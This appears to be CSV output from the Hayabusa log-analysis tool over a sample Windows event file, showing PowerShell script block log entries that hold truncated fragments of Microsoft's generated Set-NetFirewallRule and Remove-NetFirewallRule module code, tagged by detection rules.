[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 
+09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] 
${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } 
} catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 